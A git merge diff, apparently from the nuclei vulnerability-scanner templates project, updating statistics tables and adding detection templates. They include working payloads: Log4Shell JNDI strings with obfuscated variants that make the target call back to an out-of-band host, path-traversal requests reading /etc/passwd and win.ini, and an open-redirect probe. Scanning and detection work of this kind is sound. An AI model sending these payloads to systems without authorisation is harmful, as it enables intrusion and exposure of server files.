Merge branch 'master' into master

2021-12-13 05:07:57 -05:00 · 2021-12-13 05:07:57 -05:00 · 030cfe89b9
parent f52b1f0d55 a514552bdf
commit 030cfe89b9
11 changed files with 1517 additions and 1103 deletions
--- a/README.md
+++ b/README.md
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,

 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve       |   920 | daffainfo     |   348 | cves             |   926 | info     |   912 | http    |  2503 |
-| lfi       |   382 | dhiyaneshdk   |   341 | vulnerabilities  |   350 | high     |   695 | file    |    57 |
-| panel     |   319 | pikpikcu      |   286 | exposed-panels   |   319 | medium   |   527 | network |    47 |
-| xss       |   289 | pdteam        |   216 | technologies     |   225 | critical |   324 | dns     |    12 |
+| cve       |   921 | daffainfo     |   354 | cves             |   927 | info     |   918 | http    |  2512 |
+| lfi       |   382 | dhiyaneshdk   |   342 | vulnerabilities  |   352 | high     |   695 | file    |    57 |
+| panel     |   321 | pikpikcu      |   287 | exposed-panels   |   321 | medium   |   528 | network |    47 |
+| xss       |   290 | pdteam        |   216 | technologies     |   226 | critical |   326 | dns     |    12 |
 | wordpress |   270 | geeknik       |   172 | exposures        |   196 | low      |   166 |         |       |
-| exposure  |   250 | dwisiswant0   |   157 | misconfiguration |   164 |          |       |         |       |
-| rce       |   230 | gy741         |    90 | token-spray      |   130 |          |       |         |       |
-| tech      |   228 | pussycat0x    |    90 | takeovers        |    65 |          |       |         |       |
-| cve2021   |   191 | 0x_akoko      |    77 | default-logins   |    63 |          |       |         |       |
+| exposure  |   250 | dwisiswant0   |   158 | misconfiguration |   164 |          |       |         |       |
+| rce       |   231 | gy741         |    91 | token-spray      |   133 |          |       |         |       |
+| tech      |   230 | pussycat0x    |    91 | takeovers        |    65 |          |       |         |       |
+| cve2021   |   192 | 0x_akoko      |    77 | default-logins   |    63 |          |       |         |       |
 | wp-plugin |   186 | princechaddha |    72 | file             |    57 |          |       |         |       |

-**192 directories, 2689 files**.
+**192 directories, 2700 files**.

 </td>
 </tr>
--- a/TEMPLATES-STATS.md
+++ b/TEMPLATES-STATS.md
--- a/TOP-10.md
+++ b/TOP-10.md
@ -1,5 +1,5 @@
 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
-|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
+|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------
 | cve       |   921 | daffainfo     |   348 | cves             |   927 | info     |   912 | http    |  2504 |
 | lfi       |   382 | dhiyaneshdk   |   341 | vulnerabilities  |   350 | high     |   695 | file    |    57 |
 | panel     |   319 | pikpikcu      |   286 | exposed-panels   |   319 | medium   |   527 | network |    47 |
--- a/cves/2018/CVE-2018-7467.yaml
+++ b/cves/2018/CVE-2018-7467.yaml
@ -0,0 +1,31 @@
+id: CVE-2018-7467
+info:
+  name: AxxonSoft Axxon Next Directory Traversal
+  author: 0x_Akoko
+  severity: high
+  description: AxxonSoft Axxon Next suffers from a directory traversal vulnerability.
+  reference:
+    - https://packetstormsecurity.com/files/146604/AxxonSoft-Axxon-Next-Directory-Traversal.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-7467
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2018-7467
+    cwe-id: CWE-200
+  tags: cve,cve2018,axxonsoft,lfi
+
+requests:
+  - raw:
+      - |+
+        GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini HTTP/1.1
+        Host: {{Hostname}}
+
+    unsafe: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and
--- a/cves/2021/CVE-2021-44228.yaml
+++ b/cves/2021/CVE-2021-44228.yaml
@ -0,0 +1,41 @@
+id: CVE-2021-44228
+
+info:
+  name: Remote code injection in Log4j
+  author: melbadry9,dhiyaneshDK,daffainfo
+  severity: critical
+  description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
+  reference:
+    - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
+    - https://www.lunasec.io/docs/blog/log4j-zero-day/
+    - https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
+  tags: cve,cve2021,rce,oast,log4j
+
+requests:
+  - raw:
+      - |
+        GET /?x=${jndi:ldap://${hostName}.{{interactsh-url}}/a} HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.{{interactsh-url}}}
+        Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
+        X-Forwarded-For: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
+        Authentication: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: regex
+        part: interactsh_request
+        regex:
+          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.interactsh\.com'
+
+    extractors:
+      - type: regex
+        part: interactsh_request
+        group: 1
+        regex:
+          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.interactsh\.com'   # Extract ${hostName}
--- a/exposed-panels/aerohive-netconfig-ui.yaml
+++ b/exposed-panels/aerohive-netconfig-ui.yaml
@ -0,0 +1,31 @@
+id: aerohive-netconfig-ui
+info:
+  name: Aerohive NetConfig UI
+  author: pussycat0x
+  severity: info
+  metadata:
+    shodan-dork: 'http.title:"Aerohive NetConfig UI"'
+  tags: panel,tech,hiveos,aerohive
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php5"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Aerohive NetConfig UI</title>'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'version" align="right" valign="bottom">([0-9.a-z]+)<\/td>'
--- a/exposed-panels/extreme-netconfig-ui.yaml
+++ b/exposed-panels/extreme-netconfig-ui.yaml
@ -0,0 +1,32 @@
+id: extreme-netconfig-ui
+info:
+  name: Extreme NetConfig UI
+  author: pussycat0x
+  severity: info
+  metadata:
+    shodan-dork: 'http.title:"Extreme NetConfig UI"'
+  tags: panel,tech,hiveos,extreme
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php5"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Extreme NetConfig UI</title>'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'version" align="right" valign="bottom">([0-9.a-z]+)<\/td>'
--- a/exposed-panels/xds-amr-status.yaml
+++ b/exposed-panels/xds-amr-status.yaml
@ -0,0 +1,30 @@
+id: xds-amr-status
+info:
+  name: XDS-AMR - status
+  author: pussycat0x
+  severity: info
+  metadata:
+    shodan-dork: 'http.title:"XDS-AMR - status"'
+  tags: panel,tech,xamr,xds
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login.php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>XDS-AMR - Status</title>'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - 'XAMR\-([0-9]+)'
--- a/helpers/wordlists/grafana-plugins.txt
+++ b/helpers/wordlists/grafana-plugins.txt
@ -0,0 +1,257 @@
+abhisant-druid-datasource
+aceiot-svg-panel
+ae3e-plotly-panel
+agenty-flowcharting-panel
+aidanmountford-html-panel
+akumuli-datasource
+alertlist
+alexanderzobnin-zabbix-app
+alexandra-trackmap-panel
+andig-darksky-datasource
+annolist
+anodot-datasource
+anodot-panel
+aquaqanalytics-kdbadaptor-datasource
+auxmoney-waterfall-panel
+ayoungprogrammer-finance-datasource
+barchart
+bargauge
+belugacdn-app
+bessler-pictureit-panel
+bilibala-echarts-panel
+blackmirror1-singlestat-math-panel
+blackmirror1-statusbygroup-panel
+bmchelix-ade-datasource
+bosun-app
+briangann-datatable-panel
+briangann-gauge-panel
+camptocamp-prometheus-alertmanager-datasource
+candlestick
+ccin2p3-riemann-datasource
+citilogics-geoloop-panel
+clarity89-finnhub-datasource
+cloudflare-app
+cloudspout-button-panel
+cloudwatch
+cognitedata-datasource
+corpglory-progresslist-panel
+dalmatinerdb-datasource
+dalvany-image-panel
+dashlist
+ddurieux-glpi-app
+devicehive-devicehive-datasource
+devopsprodigy-kubegraf-app
+digiapulssi-breadcrumb-panel
+digiapulssi-organisations-panel
+digrich-bubblechart-panel
+dlopes7-appdynamics-datasource
+doitintl-bigquery-datasource
+elasticsearch
+factry-untimely-panel
+farski-blendstat-panel
+fastweb-openfalcon-datasource
+fatcloud-windrose-panel
+fetzerch-sunandmoon-datasource
+fifemon-graphql-datasource
+flaminggoat-maptrack3d-panel
+flant-statusmap-panel
+foursquare-clouderamanager-datasource
+frser-sqlite-datasource
+fzakaria-simple-annotations-datasource
+gapit-htmlgraphics-panel
+gauge
+geomap
+gettingstarted
+gnocchixyz-gnocchi-datasource
+goshposh-metaqueries-datasource
+gowee-traceroutemap-panel
+grafadruid-druid-datasource
+grafana-athena-datasource
+grafana-azure-data-explorer-datasource
+grafana-azure-monitor-datasource
+grafana-clickhouse-datasource
+grafana-clock-panel
+grafana-datadog-datasource
+grafana-discourse-datasource
+grafana-dynatrace-datasource
+grafana-enterprise-logs-app
+grafana-enterprise-traces-app
+grafana-es-open-distro-datasource
+grafana-github-datasource
+grafana-gitlab-datasource
+grafana-googlesheets-datasource
+grafana-guidedtour-panel
+grafana-honeycomb-datasource
+grafana-image-renderer
+grafana-iot-sitewise-datasource
+grafana-iot-twinmaker-app
+grafana-jira-datasource
+grafana-k6cloud-datasource
+grafana-kairosdb-datasource
+grafana-metrics-enterprise-app
+grafana-mongodb-datasource
+grafana-newrelic-datasource
+grafana-opcua-datasource
+grafana-opensearch-datasource
+grafana-oracle-datasource
+grafana-piechart-panel
+grafana-polystat-panel
+grafana-redshift-datasource
+grafana-salesforce-datasource
+grafana-saphana-datasource
+grafana-sentry-datasource
+grafana-servicenow-datasource
+grafana-simple-json-datasource
+grafana-singlestat-panel
+grafana-snowflake-datasource
+grafana-splunk-datasource
+grafana-splunk-monitoring-datasource
+grafana-strava-datasource
+grafana-synthetic-monitoring-app
+grafana-timestream-datasource
+grafana-wavefront-datasource
+grafana-worldmap-panel
+grafana-x-ray-datasource
+graph
+graphite
+gretamosa-topology-panel
+gridprotectionalliance-openhistorian-datasource
+gridprotectionalliance-osisoftpi-datasource
+groonga-datasource
+hadesarchitect-cassandra-datasource
+hawkular-datasource
+heatmap
+histogram
+humio-datasource
+ibm-apm-datasource
+influxdb
+innius-grpc-datasource
+innius-video-panel
+instana-datasource
+integrationmatters-comparison-panel
+isaozler-paretochart-panel
+itrs-hub-datasource
+jaeger
+jasonlashua-prtg-datasource
+jdbranham-diagram-panel
+jeanbaptistewatenberg-percent-panel
+larona-epict-panel
+lightstep-metrics-datasource
+linksmart-hds-datasource
+linksmart-sensorthings-datasource
+logs
+loki
+macropower-analytics-panel
+magnesium-wordcloud-panel
+marcuscalidus-svg-panel
+marcusolsson-calendar-panel
+marcusolsson-csv-datasource
+marcusolsson-dynamictext-panel
+marcusolsson-gantt-panel
+marcusolsson-hexmap-panel
+marcusolsson-hourly-heatmap-panel
+marcusolsson-json-datasource
+marcusolsson-static-datasource
+marcusolsson-treemap-panel
+meteostat-meteostat-datasource
+michaeldmoore-annunciator-panel
+michaeldmoore-multistat-panel
+michaeldmoore-scatter-panel
+monasca-datasource
+monitoringartist-monitoringart-datasource
+moogsoft-aiops-app
+mssql
+mtanda-google-calendar-datasource
+mtanda-heatmap-epoch-panel
+mtanda-histogram-panel
+mxswat-separator-panel
+mysql
+natel-discrete-panel
+natel-influx-admin-panel
+natel-plotly-panel
+natel-usgs-datasource
+neocat-cal-heatmap-panel
+netsage-sankey-panel
+news
+nodeGraph
+novalabs-annotations-panel
+novatec-sdg-panel
+ntop-ntopng-datasource
+oci-logs-datasource
+oci-metrics-datasource
+opennms-helm-app
+opentsdb
+ovh-warp10-datasource
+paytm-kapacitor-datasource
+percona-percona-app
+petrslavotinek-carpetplot-panel
+piechart
+pierosavi-imageit-panel
+pixie-pixie-datasource
+pluginlist
+postgres
+pr0ps-trackmap-panel
+praj-ams-datasource
+prometheus
+pue-solr-datasource
+pyroscope-datasource
+pyroscope-panel
+quasardb-datasource
+rackerlabs-blueflood-datasource
+radensolutions-netxms-datasource
+redis-app
+redis-datasource
+redis-explorer-app
+ryantxu-ajax-panel
+ryantxu-annolist-panel
+satellogic-3d-globe-panel
+savantly-heatmap-panel
+sbueringer-consul-datasource
+scadavis-synoptic-panel
+sebastiangunreben-cdf-panel
+sidewinder-datasource
+simpod-json-datasource
+singlestat
+skydive-datasource
+smartmakers-trafficlight-panel
+sni-pnp-datasource
+sni-thruk-datasource
+snuids-radar-panel
+snuids-svg-panel
+snuids-trafficlights-panel
+speakyourcode-button-panel
+spotify-heroic-datasource
+sskgo-perfcurve-panel
+stackdriver
+stagemonitor-elasticsearch-app
+stat
+state-timeline
+status-histor
+streamr-datasource
+table
+table-old
+teamviewer-datasource
+tempo
+tencentcloud-monitor-app
+testdata
+text
+thalysantana-appcenter-datasource
+thiagoarrais-matomotracking-panel
+timeseries
+udoprog-heroic-datasource
+vertamedia-clickhouse-datasource
+vertica-grafana-datasource
+verticle-flowhook-datasource
+volkovlabs-image-panel
+vonage-status-panel
+voxter-app
+welcome
+williamvenner-timepickerbuttons-panel
+woutervh-mapbox-panel
+xginn8-pagerduty-datasource
+yesoreyeram-boomtable-panel
+yesoreyeram-boomtheme-panel
+yesoreyeram-infinity-datasource
+yeya24-chaosmesh-datasource
+zipkin
+zuburqan-parity-report-panel
--- a/vulnerabilities/grafana/grafana-file-read.yaml
+++ b/vulnerabilities/grafana/grafana-file-read.yaml
@ -2,7 +2,7 @@ id: grafana-file-read

 info:
  name: Grafana v8.x Arbitrary File Read
-  author: z0ne,dhiyaneshDk,jeya.seelan
+  author: z0ne,dhiyaneshDk,jeya.seelan,dwisiswant0
  severity: high
  reference:
    - https://nosec.org/home/detail/4914.html
@ -14,51 +14,12 @@ info:
 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/public/plugins/{{plugin-id}}/../../../../../../../../../../../../../../../../../../../etc/passwd"
+      - "{{BaseURL}}/public/plugins/{{pluginSlug}}/../../../../../../../../../../../../../../../../../../../etc/passwd"

    payloads:
-      plugin-id:
-        - alertlist
-        - annolist
-        - barchart
-        - bargauge
-        - candlestick
-        - cloudwatch
-        - dashlist
-        - elasticsearch
-        - gauge
-        - geomap
-        - gettingstarted
-        - grafana-azure-monitor-datasource
-        - graph
-        - heatmap
-        - histogram
-        - influxdb
-        - jaeger
-        - logs
-        - loki
-        - mssql
-        - mysql
-        - news
-        - nodeGraph
-        - opentsdb
-        - piechart
-        - pluginlist
-        - postgres
-        - prometheus
-        - stackdriver
-        - stat
-        - state-timeline
-        - status-history
-        - table
-        - table-old
-        - tempo
-        - testdata
-        - text
-        - timeseries
-        - welcome
-        - zipkin
+      pluginSlug: helpers/wordlists/grafana-plugins.txt

+    threads: 50
    stop-at-first-match: true
    matchers-condition: and
    matchers:
--- a/vulnerabilities/wordpress/pieregister-open-redirect.yaml
+++ b/vulnerabilities/wordpress/pieregister-open-redirect.yaml
@ -0,0 +1,22 @@
+id: pieregister-open-redirect
+
+info:
+  name: Pie Register < 3.7.2.4 - Open Redirect
+  severity: low
+  author: 0x_Akoko
+  description: The plugin passes unvalidated user input to the wp_redirect() function, without validating it, leading to an Open redirect issue.
+  reference:
+    - https://wpscan.com/vulnerability/f6efa32f-51df-44b4-bbba-e67ed5785dd4
+    - https://wordpress.org/plugins/pie-register/
+  tags: wordpress,redirect,wp-plugin,pieregister
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://example.com"
+
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'